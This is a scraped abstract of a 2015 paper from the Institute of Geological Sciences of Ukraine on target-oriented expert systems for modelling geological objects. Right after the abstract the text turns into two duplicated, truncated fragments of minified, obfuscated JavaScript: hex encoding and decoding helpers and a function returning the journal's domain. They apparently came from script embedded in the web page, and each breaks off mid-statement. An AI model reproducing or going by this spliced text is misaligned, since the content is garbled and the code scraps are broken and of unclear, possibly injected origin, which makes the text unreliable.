THE TARGET EXPERT SYSTEMS OF GEOLOGICAL ORIENTATION: THE CONCEPTION OF PROBLEM - Khrushchov, D.P.; Lobasov, A.P.; Kovalchuk, M.S.; Remezova, O.O.; Bosevska, L.P. (Institute of Geological Sciences, NAS of Ukraine, 2015)
The Problem of Implementation into Geological Practice of Target Oriented Expert Systems (TES) basing upon Principles of Geological Objects Complex Modelling based on Modern Computer Technologies with a Perspective of Artificial Intellect Elements introducing is considered. The Methodological basis of CES is Complex Evaluation of a Geological Environment by means of Integrated Model Construction of Defined Orientation.// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "geojournal.igs-nas.org.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "geojournal.igs-nas.org.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e